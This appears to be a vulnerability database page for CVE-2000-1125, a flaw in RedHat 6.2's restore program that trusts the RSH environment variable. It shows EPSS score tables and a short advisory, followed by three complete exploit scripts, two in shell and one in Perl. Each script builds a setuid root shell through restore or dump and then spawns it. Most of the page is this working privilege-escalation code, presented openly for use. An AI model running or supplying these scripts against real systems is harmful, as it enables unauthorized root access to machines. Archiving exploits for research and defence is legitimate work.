CVE-2000-1125 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.76%	–	–
2022-03-27	–	–	1.76%	–	–
2022-04-03	–	–	1.76%	–	–
2022-04-17	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.12%
2025-03-30	–	–	–	–	0.15%
2025-04-06	–	–	–	–	0.15%
2025-04-08	–	–	–	–	0.15%
2025-04-09	–	–	–	–	0.15%
2025-04-14	–	–	–	–	0.15%
2025-04-15	–	–	–	–	0.15%
2025-04-15	–	–	–	–	0.15,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	29%
2025-03-30	31%
2025-04-06	32%
2025-04-08	31%
2025-04-09	32%
2025-04-14	31%
2025-04-15	36%
2025-04-15	36%

source: https://www.securityfocus.com/bid/1914/info restore is a program for backup and recovery procedures, distributed with the RedHat Linux Operating System. A vulnerability exists that could allow a user elevated permissions. The problem occurs in the RSH environment variable. restore is dependent upon this environment variable for execution. It is possible to set this variable PATH to that of an executable, and then execute restore. This will result in the executable in the RSH environment variable being run with an EUID of 0. Exploitation of this vulnerability by a malicious user can result in root compromise. #!/bin/sh # # Exploits a stupid bug in redhat 6.2's (others..) restore program. # restore version 0.4b15 executes a program which is found in # a user modifiable environment variable (RSH). # # Have fun! # - fish # # Shoutouts: trey, burke, dono, sinator, jadrax, minuway, lews, hubbs, # ralph, jen, madspin, hampton, ego, als, scorch. # # Cause we da pimpz of #code! (not ef/dal.. etc) # (irc > irl ? werd : lame) # # WERD to the async, isolated, expedience, mindsong, and analog crews # # # #TelcoNinjas can eat it cause they suck hardc0re # #TelcoNinjas == #smurfkiddies # echo "[spl0it]: Starting." echo -n "[spl0it]: creating shell spawn... " echo "#include <stdio.h>" > cool.c echo "int main(void) { " >> cool.c echo " setuid(0);" >> cool.c echo " setgid(0);" >> cool.c echo " execl(\"/bin/sh\", \"-bash\", NULL);" >> cool.c echo " return 0;" >> cool.c echo "}" >> cool.c echo -e "\t\t\tdone" echo -n "[sploit]: Compiling shell spawn... " gcc -o cool cool.c echo -e "\t\t\tdone" echo -n "[sploit]: Creating fake rsh program... " cat > execute_me << EOF #!/bin/sh chown root: cool chmod 4777 cool EOF chmod +x execute_me echo -e "\t\t\tdone" # now executing the dump command echo "[spl0it]: Beginning exploitation: " export TAPE=garbage:garbage export RSH=./execute_me /sbin/restore -i # Exec'n the r00t sh3ll! echo -n "[spl0it]: Waiting 4 seconds for suid shell... " sleep 4 echo -e "\t\tdone" if [ ! -u ./cool ]; then echo "[spl0it]: Hmm it didn't work.. Better luck next time eh" echo "[spl0it]: Check ./cool anyway =)" exit 0 fi echo "[spl0it]: It Worked! suid shell is now ./cool" echo "[spl0it]: Entering suid shell..." ./cool exit 0

#!/bin/sh # # /sbin/restore exploit for rh6.2 # # I did not find this weakness my self, all i did was # writing this script (and some more) to make it # automatic and easy to use. # # This exploit should work on all redhat 6.2 systems # with /sbin/restore not "fucked up". May work on other # distros too, but only tested successfully on rh6.2. # # Make sure that the $USER variable is set! If you aren't # sure, do a SET USER=<your-login-name> before you start # the exploit! # # Please do NOT remove this header from the file. # echo "###########################################" echo "# /sbin/restore exploit for rh6.2 #" echo "# this file by nawok '00 #" echo "###########################################" echo " " echo "==> EXPLOIT STARTED, Wait..." echo "#!/bin/sh" >> /home/$USER/execfile echo "cp /bin/sh /home/$USER/sh" >> /home/$USER/execfile echo "chmod 4755 /home/$USER/sh" >> /home/$USER/execfile chmod 755 /home/$USER/execfile export TAPE=restorer:restorer export RSH=/home/$USER/execfile touch /tmp/1 /sbin/restore -t /tmp/1 rm -f /home/$USER/execfile echo "==> DONE! If everything went OK we will now enter rootshell..." echo "==> To check if its rooted, type 'whoami', or 'id'" echo "==> B-Bye, you are on your own now." /home/$USER/sh # milw0rm.com [2000-11-16]

#!/usr/bin/perl # perl exploit of restore and dump # redhat linux 6.2 # written by tlabs # Use at your discretion $EXPORT1="TAPE=garbage:garbage" ; $EXPORT2="RSH=./hey" ; sub USAGE { print "$0 <type>\n1=dump 2=dump.static 3=restore 4=restore.staic\nYour choice innit;)\nWritten by Tlabs\n" ; exit 0 ; } sub ERROR { print "$_[0]\n" ; exit 0 ; } open(TEMP, ">shell.c")|| ERROR("Something went wrong:$!"); printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ; printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}" ; close(TEMP); system "cc -o shell shell.c" ; unlink "shell.c" ; open(TEMP1, ">hey")|| ERROR("Something went wrong: $!"); printf TEMP1 "#!/bin/sh\nchown root shell\nchmod 4755 shell" ; close(TEMP1); chmod(0755, "hey"); if ($ARGV[$0] eq "1") { $DUMPER="/sbin/dump" ; if ( -u "$DUMPER" ) { system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Dump is not exploitable on this system\n"; } } elsif ($ARGV[$0] eq "2") { $DUMPER="/sbin/dump.static" ; if ( -u "$DUMPER" ) { system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Dump.static is not exploitable on this system\n"; } } elsif ($ARGV[$0] eq "3") { $RESTORER="/sbin/restore" ; if ( -u "$RESTORER" ) { system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Restore is not exploitable on this system\n"; } } elsif ($ARGV[$0] eq "4") { $RESTORER="/sbin/restore.static" ; if ( -u "$RESTORER" ) { system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ; sleep(3); if ( -u "shell" ) { unlink "hey" ; system "./shell" ; } else { unlink "hey" ; unlink "shell" ; print "Something fucked at the last, sorry" ; } } else { unlink "hey" ; unlink "shell" ; printf "Restore.static is not exploitable on this system\n"; } } else { USAGE ; } # milw0rm.com [2000-11-16]